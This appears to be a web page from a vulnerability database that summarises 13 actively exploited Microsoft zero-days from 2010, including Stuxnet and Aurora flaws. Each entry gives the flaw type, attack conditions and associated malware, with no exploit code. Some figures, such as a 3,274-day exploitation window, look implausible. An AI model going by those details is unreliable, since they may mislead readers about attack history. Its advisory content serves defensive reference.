Zero-day Vulnerability Database

Change view

Zero-day vulnerabilities discovered: 13

Remote code execution in Microsoft Internet Explorer
CVE-2010-3971

Memory corruption

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to boundary error when parsing CSS styles. A remote attacker can create a specially crafted web page containing Cascading Style Sheet that refers to itself recursively, cause memory corruption and execute arbitrary code on the target system with privileges of the current user.

Successful exploitation of this vulnerability may allow an attacker to compromise vulnerable system.

Note: this vulnerability is being actively exploited.

i

The vulnerability appears to be connected to the group of Chinese hackers responsible for unleashing a pair of Java zero-day exploits in 2012. After examining of the geographical location of the targets for CVE-2010-3971, these attack attempts bear a close resemblance to those targeting CVE-2010-3962, another Internet Explorer issue that was dubbed as the Weekend Warrior.

Software: Microsoft Internet Explorer

Known/fameous malware:

Virus HTML:CVE-2010-3971-A

The vulnerability appears to be connected to the group of Chinese hackers responsible for unleashing a pair of Java zero-day exploits in 2012. After examining of the geographical location of the targets for CVE-2010-3971, these attack attempts bear a close resemblance to those targeting CVE-2010-3962, another Internet Explorer issue that was dubbed as the Weekend Warrior.

Privilege escalation in Windows Task Scheduler
CVE-2010-3338

Privilege escalation

The vulnerability allows a local user obtain elevated privileges on vulnerable system.

The vulnerability exists in Windows Task Scheduler when running scheduled tasks within the intended security context. A local user can create a specially crafted task and execute arbitrary code on vulnerable system with privileges of the local system account.

Successful exploitation of this vulnerability may allow a local user to obtain full access to vulnerable system.

Note: this vulnerability is being actively exploited.

i

The vulnerability was used by Stuxnet.

Software: Windows

Known/fameous malware:

W32.Stuxnet TDL-4 rootkit (TDSS) Trojan.Generic.KDV.128306

The vulnerability was used by Stuxnet.

Use-after-free when parsing CSS in Internet Explorer
CVE-2010-3962

Use-after-free

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to use-after-free error when processing CSS token sequences and the clip attribute. A remote attacker can create a specially crafted HTML page, trick the victim into visiting it, cause memory corruption and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note: this vulnerability is being actively exploited.

i

The vulnerability refers to cyberattacks, linked to the Nobel Peace Prize ceremony and G20-related malicious spam campaign reported in October 2010.

Software: Microsoft Internet Explorer

Known/fameous malware:

Exploit: Win32/CVE-2010-3962.A.

The vulnerability refers to cyberattacks, linked to the Nobel Peace Prize ceremony and G20-related malicious spam campaign reported in October 2010.

Multiple privilege escalation vulnerabilities in Win32k.sys in Microsoft Windows
CVE-2010-2743

Improper validation of array index

The vulnerability allows a local user to execute arbitrary code with elevated privileges.

The vulnerability exists due to an error in Win32k.sys driver when handling keyboard layouts as the Windows kernel fails to validate that an array index is within the bounds of the array. A local user can load a specially crafted keyboard layout and execute arbitrary code on the target system with privileges of SYSTEM account.

Successful exploitation of this vulnerability may allow an attacker to escalate privileges on vulnerable system.

Note: this vulnerability is being actively exploited by Stuxnet.
i

The vulnerability was discovered by Sergey Golovanov from Kaspersky Lab. The vulnerability was exploited by Stuxnet.

Software: Windows

Known/fameous malware:

W32.Stuxnet

The vulnerability was discovered by Sergey Golovanov from Kaspersky Lab. The vulnerability was exploited by Stuxnet.

Information disclosure in ASP.NET
CVE-2010-3332

Information disclosure

The vulnerability allows a remote attacker to obtain potentially sensitive information.

The vulnerability exists due to improper handling of errors during encryption padding verification. A remote attacker can gain access to potentially sensitive encrypted information, such as view state, read files and possibly forge cookies.

Successful exploitation of the vulnerability may allow an attacker to gain access to sensitive information and potentially compromise vulnerable web application.

Note: this vulnerability is being publicly exploited.

Software: Microsoft .NET Framework

Remote code execution in Print Spooler service in Microsoft Windows
CVE-2010-2729

Improper access control

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to Windows Print Spooler service does not correctly restricts access permissions to create files for anonymous users. A remote attacker can send specially crafted RPC request to vulnerable service and upload malicious file to arbitrary location on the system.

This is a remote code execution vulnerability on Windows XP, since the guest account is enabled by default. On other operating systems this is a privilege escalation vulnerability, as only authenticated users have access to Print Spooler shares.

Successful exploitation of the vulnerability may result in remote code execution.

Note: this vulnerability is being actively exploited.

i

Two more CVEs refer to this vulnerability as well: CVE-2010-3888 and CVE-2010-3889. However since the vendor has issued advisory with different CVE number, we will use the one issued by Microsoft.

The vulnerability has been exploited in “print-bomb†attack as Stuxnet worm.

Software: Windows

Two more CVEs refer to this vulnerability as well: CVE-2010-3888 and CVE-2010-3889. However since the vendor has issued advisory with different CVE number, we will use the one issued by Microsoft.

The vulnerability has been exploited in “print-bomb†attack as Stuxnet worm.

Remote code execution in Microsoft Windows
CVE-2010-2568

Improper input validation

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to an error when parsing icons to .lnk and .pif files within Windows Explorer. A remote attacker can create a specially crafted icon file, trick the victim into clicking on it and execute arbitrary code on the target system with privileges of the current user.

Successful exploitation of the vulnerability results in compromise of vulnerable system.

Note: this vulnerability is being actively exploited.

i

The vulnerability was used by Stuxnet worm. According to Symantec the first exploitation of the vulnerability was discovered on 2008-02-13.

Software: Windows

Known/fameous malware:

Bloodhound.Exploit.343
W32.Stuxnet
W32.Changeup.C
W32.Ramnit

The vulnerability was used by Stuxnet worm. According to Symantec the first exploitation of the vulnerability was discovered on 2008-02-13.

Remote code execution when parsing URLs in Microsoft Windows
CVE-2010-1885

Improper input validation

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to an error when parsing URLs within Microsoft Help and Support Center. A remote attacker can create a specially crafted hcp:// URL, trick the victim into clicking on it and execute arbitrary code on the target system with privileges of the current user.

Successful exploitation of the vulnerability results in compromise of vulnerable system.

Note: this vulnerability is being actively exploited.

i

The vulnerability was reported to Microsoft on July, 5th by Google security researcher Tavis Ormandy.
The vulnerability was used to compromise Federal Financial Institutions Examination Council via “inform@ffiec.gov†mailbox.

Software: Windows

Known/fameous malware:

Mal/HcpExpl-A

The vulnerability was reported to Microsoft on July, 5th by Google security researcher Tavis Ormandy.
The vulnerability was used to compromise Federal Financial Institutions Examination Council via “inform@ffiec.gov†mailbox.

Buffer overflow in MPEG layer-3 codecs in Microsoft Windows
CVE-2010-0480

Stack-based buffer overflow

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to multiple boundary errors within Microsoft MPEG Layer-3 codecs when parsing AVI files. A remote unauthenticated attacker can create a specially crafted AVI file, trick the victim into opening it, trigger stack-based buffer overflow and execute arbitrary code on the target system with privileges of the current user.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note: the vulnerability was being actively exploited.

i

According to Symantec the first exploitation of the vulnerability was discovered on 26.03.2010.

Software: Windows

Known/fameous malware:

Bloodhound.Exploit.324

According to Symantec the first exploitation of the vulnerability was discovered on 26.03.2010.

Multiple vulnerabilities in Microsoft SharePoint
CVE-2010-0817

Cross-site scripting

The vulnerability allows a remote attacker to perform XSS attacks.

The vulnerability exists due to insufficient sanitization of user-supplied input data passed to Help.aspx script. A remote attacker can trick the victim into following a specially crafted link and execute arbitrary HTML and script code in victim’s browser in context of vulnerable SharePoint website.

Successful exploitation may allow an attacker to conduct phishing and drive-by-download attacks.

Note: this vulnerability is being publicly exploited.

Software: Microsoft SharePoint Server

Known/fameous malware:

Exploit: Win32/CVE-2010-0817

Remote code execution in Microsoft Internet Explorer
CVE-2010-0806

Use-after-free

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to use-after-free error in the Peer Objects component within iepeers.dll library. A remote attacker can create a specially crafted web page, trick the victim into visiting it and execute arbitrary code via vectors involving access to an invalid pointer after the deletion of an object.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note: this vulnerability is being actively exploited.

i

The vulnerability is declared as functional and was handled as a non-public zero-day exploit for at least 3274 days. The story of CVE-2010-0806 bears a certain similarity to the developments in the case of the targeted 'Aurora' attack where the exploit techniques were quickly adopted by the authors of web exploit kits for the use in massive web attacks. The country that suffered a huge loss by malware in April 2010 was China, with 22% of malware attacks. It was followed by Russia (17%), USA (10%), India (4%) and Germany (4%).

Software: Microsoft Internet Explorer

Known/fameous malware:

Some of the variants: Trojan:Win32/Wisp, TrojanDropper:Win32/Lisiu, TrojanDropper:Win32/Agent.gen!I, TrojanDownloader:Win32/Small.gen!AZ, Backdoor:Win32/Agent.FS, TrojanDropper:Win32/Frethog.

The vulnerability is declared as functional and was handled as a non-public zero-day exploit for at least 3274 days. The story of CVE-2010-0806 bears a certain similarity to the developments in the case of the targeted 'Aurora' attack where the exploit techniques were quickly adopted by the authors of web exploit kits for the use in massive web attacks. The country that suffered a huge loss by malware in April 2010 was China, with 22% of malware attacks. It was followed by Russia (17%), USA (10%), India (4%) and Germany (4%).

Integer overflow in Microsoft Paint
CVE-2010-0028

Integer overflow

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

he vulnerability exists due to integer overflow when processing JPEG files using Microsoft Paint. A remote attacker can create a specially crafted JPEG file, trick the victim into opening it using Microsoft Pain application, trigger integer overflow and execute arbitrary code on the target system with privileges of the current user.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note: this vulnerability is being actively exploited in the wild.
i

The first attack using exploit for this vulnerability was detected in October 14, 2008 by Symantec. The attackers targeted 102 hosts using 127 malware variants.

Software: Paint

Known/fameous malware:

Bloodhound.Exploit.314

The first attack using exploit for this vulnerability was detected in October 14, 2008 by Symantec. The attackers targeted 102 hosts using 127 malware variants.

Remote code execution in Microsoft Internet Explorer
CVE-2010-0249

Use-after-free

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to use-after-free error in Microsoft Internet Explorer. A remote attacker can execute arbitrary code by accessing a pointer associated with a deleted object.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note: this vulnerability is being actively exploited.

i

Aurora exploit was used in targeted attacks ("Aurora") on Google and other U.S. companies, and which Google claims originated in China. Source code was stolen from some of the more than 30 Silicon Valley companies targeted in the attack.

Software: Microsoft Internet Explorer

Aurora exploit was used in targeted attacks ("Aurora") on Google and other U.S. companies, and which Google claims originated in China. Source code was stolen from some of the more than 30 Silicon Valley companies targeted in the attack.